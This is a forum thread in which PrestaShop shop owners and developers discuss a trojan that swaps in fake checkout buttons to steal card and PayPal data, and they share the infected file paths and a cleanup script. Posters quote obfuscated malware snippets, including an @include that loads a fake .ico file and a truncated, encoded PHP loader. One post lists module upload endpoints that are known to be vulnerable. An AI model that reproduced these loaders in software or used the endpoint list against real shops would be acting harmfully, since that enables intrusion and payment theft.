Prestashop 1.6 trojan. New method

[Prescol]

I spent 6 hours finding the files modified by this trojan who replaces checkout process with its own content to stole credit card or paypal accounts. So, in order to prevent to you more hours of research, here are some tips to find it out.

The attacker injects a code into smarty_cacheresource.php. This code, which is obsuscated in a way only a russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it. 
Then, a subtle modification is added into smarty_internal_data::assign() method. The following line is added before assigning a variable.

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of Prestashop environment, but is not. This call injects into $hook_header a malicious javascript, which is responsible for replacing the original payment button with the fake one. 

I found the same behavior recently in another shop, but the way they injected the code were much simpler, by decoding a file containing malicious javascirpt within a tpl.

Hope it helps to you if are under the same situation. For me was a pain in the ass spending half day searching it. 

Edited January 12, 2023 by Prescol (see edit history)

[TiaNex Shopping]

thank you for you work,

what's the content of Smarty_Internal_Validate::Validat   

[JakubMlk]

I passed the same injection today, it inffect a lot of files, but I don't know how to prevent to be infected. To correct your Presta it helps to copy original files over infected ones.

Infected files:

• controllers\front\IndexController.php
• modules\bankwire\controllers\front\validation.php
• tools\smarty\sysplugins\smarty_cacheresource.php
• tools\smarty\sysplugins\smarty_internal_data.php
• cache\tcpdf\index.php

[Eolia]

Use my cleaner.php this hack is detected

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php
 

[skur2000]

Best topic, we have this problem, and solve this. thanks !

[Shin_P]

On 1/12/2023 at 5:07 PM, Prescol said:

I spent 6 hours finding the files modified by this trojan who replaces checkout process with its own content to stole credit card or paypal accounts. So, in order to prevent to you more hours of research, here are some tips to find it out.

The attacker injects a code into smarty_cacheresource.php. This code, which is obsuscated in a way only a russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it. 
Then, a subtle modification is added into smarty_internal_data::assign() method. The following line is added before assigning a variable.

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of Prestashop environment, but is not. This call injects into $hook_header a malicious javascript, which is responsible for replacing the original payment button with the fake one. 

I found the same behavior recently in another shop, but the way they injected the code were much simpler, by decoding a file containing malicious javascirpt within a tpl.

Hope it helps to you if are under the same situation. For me was a pain in the ass spending half day searching it. 

 

I migrated to 1.7 because of this trojan

IDK what's worse..

[Eolia]

Lol

This trojan is on 1.7/8 versions too^^

[Shin_P]

f**k. me.

 

so what does your "cleaner" do? overwrites the core modified files?

has anyone found the point of entry of this hack?

 

i thought was either the outdated php version I was running with (5.6) or the PS installation (1.6)

now im on php 7.4 and PS 1.7 please tell me I'm OK or I'll kill myself XD

Edited February 2, 2023 by Shin_P (see edit history)

[Eolia]

Cleaner scans and informs you if core files have been modified, if known infections have been added, blocks certain malicious codes, destroys known added files.

The infection comes either from a badly secured third-party module, or from another CMS installed on the same hosting (WordPress not up to date or other)

The PHP version has nothing to do with the hack.

 

The 1.6.2 version will be so cool

[Shin_P]

well i had an out of date WP blog ...... 🙄

thank very much you for the informations

page bookmarked, but truly hope I won't need it soon XD

[Jurist]

looks like mulitple store of ours have just been attacked by this.

How do we prevent that issue? Cleanup is not enough. We need to stop that from happening

[Prescol]

It is a planned atack and backed by an institution, not someone in his house, bad times are coming for maintenance since each time a prestashop store is attacked it is made with zero day exploits, meaning they were kept secret until today.

[Shin_P]

time to get more religious 🙏

[Prestachamps]

Hi @Prescol,
Thank you for helping to others by sharing the information. 
Have a nice day, Leo.

[PrestaHeroes USA]

on clean shop this module will tell you when files have been modified, size/time/group/owner.

• commit trusted change
• restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

[nsordk]

Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes was back.

After searching access logs i found that 2 files in classes was changed. Tools.php and Dispatcher.php

These changes allowed the intruder to call ini.php though POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in.

This was on Prestashop 1.6

[Eolia]

il y a 2 minutes, nsordk a dit :

Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes was back.

After searching access logs i found that 2 files in classes was changed. Tools.php and Dispatcher.php

These changes allowed the intruder to call ini.php though POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in.

This was on Prestashop 1.6

Cleaner detect this^^

https://shop.devcustom.net/fr/content/16-nettoyage-hack

[PrestaHeroes USA]

On 2/6/2023 at 6:11 PM, PrestaHeroes.com said:

on clean shop this module will tell you when files have been modified, size/time/group/owner.

• commit trusted change
• restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

this will detect and you can restore.

if you manually detect and 'fix', set the leak files to read only.

also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

[Eolia]

Il y a 12 heures, Fred PrestaHeroes a dit :

also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

Lol

last infections detected on 1.7.8 version

/*b3b2b*/

@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");

/*b3b2b*/

fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

[PrestaHeroes USA]

11 hours ago, Eolia said:

Lol

last infections detected on 1.7.8 version

@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");

fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

Oh, so you think all ps are hacked? I think it's more when people use free mods which i defended to have removed from the forum....also 1.7.5 and earlier ps did dirty they create mod folder with 777 during installation. I caught them once years ago and they took it away...but it's back...

we do a lot of different stores and many customers over the years the number of people hacked was zero. We are getting new customers who are currently being hacked, one selling balls in the US for over 1,000,000 a month...the hack sent all customer info and cc info. Amazing..

Anyway, I "know" I wrote the best detect/restore module for "any" cms after my 1.4 module store was hacked, I was pissed loool.

we also have a plesk extension that does what ImunifyAV does but also has rollback...among other things.

cybersecurity is like porn, but you have to pay for it. it's me

I also have a module that analyzes ps permissions, we thought of releasing it for free but it provides information for hackers to attack....amazing.

using google translate, why do we even have separate forums, today's browser translations work fine...

Have a good weekend

[Eolia]

I'm just saying that the PS version has nothing to do.

For a hack to take place there are not 36 solutions:

- Theft of FTP credentials

- Unsecured module with upload functions

- Other unsecured CMS on the same hosting (8 obsolete WPs lately have infected PS)

Prestashop, since versions 1.2 has always controlled uploads and has never allowed direct access to these directories.

Regarding the rights, once a module is installed, regardless of whether it is 777, 755 or other, PHP can run create modify directories.

Edited February 10, 2023 by Eolia (see edit history)

[Prescol]

If you speak in English in this channel, everyone could know what are you talking about and the information will be useful for all, despite this message is posted in the english channel.

Please @Eolia and fred, im appealing to your experience in the forum, update your messages with an english version. 

[Stefand]

It this reported to PrestaShop team?

[Eolia]

il y a 29 minutes, Stefand a dit :

It this reported to PrestaShop team?

Why ? It's not a Prestashop issue.

[Stefand]

@EoliaI don't understand the trojan new method at all in this post.
"The attacker injects a code into smarty_cacheresource.php" This is a default file in PrestaShop right?
How is this trojan injected as the owner of this post says? Or is it injected in that file through a module?

[Eolia]

No, this smarty_cacheresource.php story could only allow a possible reading of the database by XSS injection and ONLY in case you have activated MySQL caching.
A patch has been proposed for all versions at this level.
Today's hacks have nothing to do with and, FYI, have been around for a long time.

https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque/16

[Eolia]

Cleaner check this file in your admin dir: get-file-admin.php

if this file not exists it's a real problem...

[redrum]

On 1/27/2023 at 5:21 PM, Eolia said:

Use my cleaner.php this hack is detected

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php
 

I suggest you change the behavior of the script, so it don't delete, edit or replace files automatically.
A better approach would be to display all the errors and let the user decide if he want to delete, edit or replace each error.

[Boonyawat]

Is there a way to prevent this?  I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again.

[PrestaHeroes USA]

14 hours ago, Boonyawat said:

Is there a way to prevent this?  I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again.

yes, upgrade to latest 1.7, remove all those disabled and free modules...

stop loading free modules, I don't know why PS allows unvetted free modules on forums.

very few hacks have been successful with 'addons' betted modules.

then put on hosting that supports Immunavy....

 

if PS is not a hobby but serious business,  sitting on hands on old PS...that's on you, loading free unvetted modules...that is on PS and you

 

 

[PrestaPro LTD]

Hello everyone again.
This means that Prestashop and other free software has run out of steam, if you don't have a lot of money or are not the smartest programmer in the world, a PrestaShop store will never be safe.

[doekia]

Le 4/10/2023 à 10:54 PM, PrestaHeroes USA a dit :

very few hacks have been successful with 'addons' betted modules.

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

List contains numerous examples that contradict such statement.

[PrestaHeroes USA]

5 hours ago, doekia said:

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

List contains numerous examples that contradict such statement.

well that is very few compared to the 1000's on there, at least they have to go through validation,  so yes three are a few, I would think PS updated their validation to try to keep those things from happent, on the free modules, that does not happen...so your point falls on deaf ears

[Eolia]

Very few ?

 

yuzu/yuzuCheck.php
yuzu/yuzuApi.php
columnadverts/uploadimage.php
columnadverts/slides/error.php
vtemslideshow/uploadimage.php
vtemslideshow/slides/error.php
realty/include/uploadimage.php
realty/include/slides/error.php
realty/evogallery/uploadimage.php
realty/evogallery/slides/error.php
realty/evogallery2/uploadimage.php
realty/evogallery2/slides/error.php
resaleform/upload.php
filesupload/error.php
megaproduct/
megaproduct/error.php
soopamobile/uploadimage.php
soopamobile/slides/error.php
soopamobile2/uploadimage.php
soopamobile2/slides/error.php
soopamobile2/uploadproduct.php
soopabanners/uploadimage.php
soopabanners/slides/error.php
vtermslideshow/uploadimage.php
vtermslideshow/slides/error.php
simpleslideshow/uploadimage.php
simpleslideshow/slides/error.php
productpageadverts/uploadimage.php
productpageadverts/slides/error.php
homepageadvertise/uploadimage.php
homepageadvertise/slides/error.php
homepageadvertise2/uploadimage.php
homepageadvertise2/slides/error.php
columnadverts2/uploadimage.php
columnadverts2/slides/error.php
filesupload/upload.php
filesupload/uploads/error.php
jro_homepageadvertise/uploadimage.php
jro_homepageadvertise/slides/error.php
jro_homepageadvertise2/uploadimage.php
jro_homepageadvertise2/slides/error.php
leosliderlayer/uploadimage.php
leosliderlayer/slides/error.php
leosliderlayer/upload_images.php
vtemskitter/uploadimage.php
vtemskitter/img/error.php
additionalproductstabs/file_upload.php
additionalproductstabs/file_uploads/error.php
addthisplugin/file_upload.php
addthisplugin/file_uploads/error.php
attributewizardpro/file_upload.php
attributewizardpro/file_uploads/error.php
attributewizardpro.OLD/file_upload.php
attributewizardpro.OLD/file_uploads/error.php
1attributewizardpro/file_upload.php
1attributewizardpro/file_uploads/error.php
attributewizardpro_x/file_upload.php
attributewizardpro_x/file_uploads/error.php
advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%252526id_slide=php
advancedslider/uploads/error.php
bamegamenu/ajax_phpcode.php
cartabandonmentpro/upload.php
cartabandonmentpro/uploads/error.php
cartabandonmentproOld/upload.php
cartabandonmentproOld/uploads/error.php
videostab/ajax_videostab.php?action=submitUploadVideo%252526id_product=upload
videostab/uploads/error.php
fieldvmegamenu/ajax/upload.php
fieldvmegamenu/uploads/error.php
orderfiles/ajax/upload.php
orderfiles/files/error.php
pk_flexmenu/ajax/upload.php
pk_flexmenu/uploads/error.php
pk_flexmenu_old/ajax/upload.php
pk_flexmenu_old/uploads/error.php
pk_vertflexmenu/ajax/upload.php
pk_vertflexmenu/uploads/error.php
nvn_export_orders/upload.php
nvn_export_orders/error.php
tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php
tdpsthemeoptionpanel/upload/error.php
psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php
psmodthemeoptionpanel/upload/error.php
lib/redactor/file_upload.php
blocktestimonial/addtestimonial.php
colorpictures
explorerpro
sampledatainstall
vm_advancedconfigurator
marketplace/libs/filemanager/dialog.php
ec_import/upload.php
vtemskitter/uploadimage.php
blocktestimonial/addtestimonial.php
/index.php?fc=module&module=orderfiles&controller=filesmanager
/index.php?fc=module&module=supercheckout&controller=supercheckout&ajax=1&method=SaveFilesCustomField
smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php
Injection possible depuis plusieurs fichiers du module infobia_properso:
infobia_properso/admin/upload.php
infobia_properso/admin/upload_motif.php
infobia_properso/maquetteajax.php
infobia_properso/transfert.php
infobia_properso/transfert2.php
infobia_properso/transfertjson.php
infobia_properso/upload.php
infobia_properso/uploadfile.php
nvn_excel_import/hayageekupload/php/upload.php
nvn_excel_import/upload.php
nvn_excel_import/uploadify.php
pkfacebook

[doekia]

And this list is not exhaustive neither !

[Mediacom87]

Hi,

To believe that only free modules are used as a gateway for hacking is a blatant mistake.

100% of the hacks I've been working on for months are related to paid modules.

Some information: https://www.mediacom87.fr/en/proactive-or-corrective-prestashop-security/

Edited May 20, 2023 by Mediacom87 (see edit history)

[DARKF3D3]

On 7/2/2023 at 12:11 AM, PrestaHeroes USA dice:

on clean shop this module will tell you when files have been modified, size/time/group/owner.

• commit trusted change
• restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

It is compatible with PS8 and PHP8.1?

[PrestaHeroes USA]

3 hours ago, DARKF3D3 said:

It is compatible with PS8 and PHP8.1?

I have just assigned someone to validate our modules on ps8, pv will be one of the first.  Will update here or via messenger.  Note: we have a plesk version of this module which has more features and can protect other/all domains defined to plesk....in case anyone interested.

[DARKF3D3]

Thank you, I could be interested into the plesk version.

[Nickz]

Shop owners should commence employing people in charge of taking care of your shop(s).
How can you put your income source solely in the abilities of self help forums? 

[DARKF3D3]

Are you talking to me?

[MockoB]

Hi @Eolia just tried your module on PS8.1 and it is not working properly. Is there any chance you'll make it compatible with the latest PS version? Thanks.

[Eolia]

No, see with Prestashop Team.

[ronniee]

Hi,

I have a PS 1.6.1.4 version, in march it was hacked somehow redirected card payment page.
At that time I solved with this:(link)
To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):
if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') { include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php'; $smarty->caching_type = 'mysql'; }

Right now again it was discovered JS/SpyBanker.IVtrojan.

I see some files changed, for ex.
classes/shop/shop.php
classes/Store.php
etc.

has something like this at the end:
$r1e="d63LgMkA570XFPH2wSZiKncUjVoaCGOlExDW_s48ftYJ9NTyzBvmhIQpbeuRqr1";$w85=$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[26].$r1e[21].$r1e[36].$r1e[57].$r1e[33].$r1e[19].$r1e[37].$r1e[41].$r1e[37];$i17cd=$r1e[22].$r1e[61].$r1e[57].$r1e[27].$r1e[41].$r1e[57].$r1e[36].$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[2KCk7IAl9Owo='));@$x3e4e();}

i know that the updgrare is imminent but right now i need to restart the shop asap, but right now i dont finded the right person

my question is the upper solution with cleaner.zip is ok for this old 1.6.1.4 version?

thank you

ron

 

[Eolia]

Yes, cleaner is ok !

[Nickz]

1 hour ago, ronniee said:

i know that the updgrare is imminent but right now i need to restart the shop asap, but right now i dont finded the right person

This and further hacks will (most likely) increase. It should lead to a broader concept of shops. Do not only have one shop, have several, that way you can redirect visitors and it's highly unlikely that you hacked all versions. 

Those set ups need time to monitor. Businesses grow and so does their employee number. 

Search your log and access files you might get the perpetrator.  

[micelio]

On 2/2/2023 at 11:55, Eolia said:

Lol

Questo trojan è presente anche nelle versioni 1.7/8^^

Hi Eolia,

thank you for providing your cleaner.php which I used on one of my sites and discovered it was infected. I replaced all the files in red with the original files from the exact version of prestashop 1.6.1.20. This did not solve the initial problem that the generated pdf invoices are unreadable.. I attach img.

Since I have two domains with two different sites in the same Hosting space, I would like to check the second site too, which is made with prestashop 1.7.8.8

I tried to put the cleaner.php in different places, but if I put it in public_html it starts but I read in "cleaner" that there are two directories to close one or something like that, how can I make cleaner? also do you have any suggestion for the correct creation of pdf invoices, thanks

Have a nice day
Elio

[Eolia]

delete your second admin.

[micelio]

22 hours ago, Eolia said:

delete your second admin.

How? delete your second admin.
But there is a site built in the second domain.

Or maybe there is um method I don't know, so I can control the second site, thanks 

[Eolia]

2 different Prestashop sites cannot have files in common.
Your second site must be in another directory.
A Prestashop site must only have one admin directory.

[Nickz]

2 hours ago, micelio said:

Or maybe there is um method I don't know, so I can control the second site, thanks 

Why don't you take the time and plan ahead, the 1.6 site you could convert into a eolia shop or Thirtybees. That way you have a fresh design, can clean the database and speed everything up.

To use 2 shops in the same hosting is not really prudent, I know most people act due to ease. But you become dependent. Dependency is not what you need in business. 

It costs you about €50 to 100 per year to use a 2nd hosting. The times where one shop conquered the world like Amazon are clearly over. Several shops raise chances in ranking over a broader spectrum and give you more security. Except if they infect your PC. 

If you wish for safety, use a Laptop to access shops and another to open emails.  

[micelio]

5 hours ago, Eolia said:

2 different Prestashop sites cannot have files in common.
Your second site must be in another directory.
A Prestashop site must only have one admin directory.

do you know if there is a practical way to separate the two sites? Since they are both in the same hosting is they have folders in common.

The second domonio is under construction, I could redo it and it is not a problem.

I would just like to save the site which is: www.micelimoto.com and I am fine with prestashop version 1.6.1.20

Thank you

[Eolia]

Keep all your directories except the duplicate admin.

Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory.
Then, install your Prestashop (or PhenixSuite) in your new directory)

[micelio]

2 hours ago, Eolia said:

Keep all your directories except the duplicate admin.

Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory.
Then, install your Prestashop (or PhenixSuite) in your new directory)

I think I am not capable of doing what you tell me.

I can create in the same level as public_html a new directory (new folder) and name it after the name of the 2 domain, okay?

I don't know how to get my second domain to point to this new directory.

But won't all the existing shared directories of the two different versions of prestashop bother each other?

Could you help me with that? I would like to correct this situation I have in hosting. Create two completely separate sites in the same space, each with its own version of prestashop. Do you think this correction can be made? Thanks

[Eolia]

At your host you can define to which folder the new domain should be directed.

[Maxflor]

Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much
 

[Nickz]

1 hour ago, Maxflor said:

and our server is overwhelmed and crashes.

Make a backup, export the database, clean everything up. Get a better server. While you at it change access to backend, databases.
In your shoes I would redo the entire shop.

 

[Maxflor]

Nickz 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect clodflare to the website to speed it up a bit.

Thank you very much

[Mediacom87]

il y a 33 minutes, Maxflor a dit :

Nickz 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect clodflare to the website to speed it up a bit.

Thank you very much

Explain how to do in 2 minutes something that takes at least a day to do.

There are no secrets, no tricks to be passed on, just common sense, an analysis of all the files, of the entire structure, knowing the normal PrestaShop structure by heart saves time, but that's something you acquire over the long term, and I'm not even talking about intervening on a site that has never respected anything.

Everything has already been explained, sites reference all the security alerts, already posted several times, community modules allow you to identify vulnerabilities, already posted dozens of times, techniques have been explained, written in articles, to climb the first step of the staircase, but there's no secret, just work and knowledge.

You've got flaws, you haven't fixed them, and since your site has been hacked, it's going to be hacked every week by one or other technique, since it's now on the list of sites to be hacked.

The only way to do this is to clean up all the code in all the modules, one by one.

[Eolia]

Il y a 3 heures, Maxflor a dit :

Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much
 

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php

[sebastienazar]

VERY GOOD TOOLS ! Thank you for evolution ! 

[Nickz]

10 hours ago, Maxflor said:

 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails.

Redoing a shop removes every possible entrance to your shop.
Removing parts of code leaves the shop open to new hacks.

mails which are sent from your server mean you are hacked.

[braccetto]

Hi friend i've been attacked by trojan some days ago

i placed a backup on local and tried the cleaner.php

but not working at well.

- It starts and check for upgrading 

- it download the upgraded file ('3.1.9') and reneamed itsefl by alfanumeric one

- but it stucks and don't start (also tried to reneme again in cleaner.php but it restart to says "telechargement de la dernier version....."

- i'm now in a loop, because after "telechargement" it sais "impossible to reach site"

anyone know is compatible with ps 1.6.1.7 and php 7?  (the version i'm running)

 

   

[sebastienazar]

il faut augmenter la mémoire du serveur avec un php.ini 

ca a fonctionné pour moi. 

 

[PrestaHeroes USA]

to know when files are changed on your PrestaShop this module will alert you, if unauthorized changes you can restore the file(s).  Nothing like this for any CMS on the planet.

https://prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

[skur2000]

hi friends.

can help me, old prestashop 1.6 version with 3.2.1 cleaner have 500 internal server error.

i use old version cleaner script, this update after run, and i see change name this script and next - internal server error after seconds run script work. logs clear.

before cleaner started and work very fine, may be after script update this

500 Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator at to inform them of the time this error occurred, and the actions you performed just before this error.

More information about this error may be available in the server error log.

[Atomico]

On 1/27/2023 at 5:21 PM, Eolia said:

Use my cleaner.php this hack is detected

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php
 

Hello, i am trying your script but after a first update, i receive error 500.

[Nickz]

48 minutes ago, Atomico said:

Hello, i am trying your script but after a first update, i receive error 500.

look into the server-logs, many times here: var/log/apache2/errorlog

Edited April 16 by Nickz (see edit history)

[Atomico]

15 hours ago, Nickz said:

look into the server-logs, many times here: var/log/apache2/errorlog

Hello, i have only these 2 row :

 

[Wed Apr 17 08:48:45.882526 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] [client xxxxxx:33932] AH01067: Failed to read FastCGI header
[Wed Apr 17 08:48:45.882574 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] (104)Connection reset by peer: [client xxxxxx:33932] AH01075: Error dispatching request to :

[Nickz]

8 hours ago, Atomico said:

AH01067: Failed to read FastCGI header

have a look here: https://serverpilot.io/docs/error-failed-to-read-fastcgi-header/

[PrestaHeroes USA]

not sure why this is not more famous, oh right this is prestashop eco loool

 

https://prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215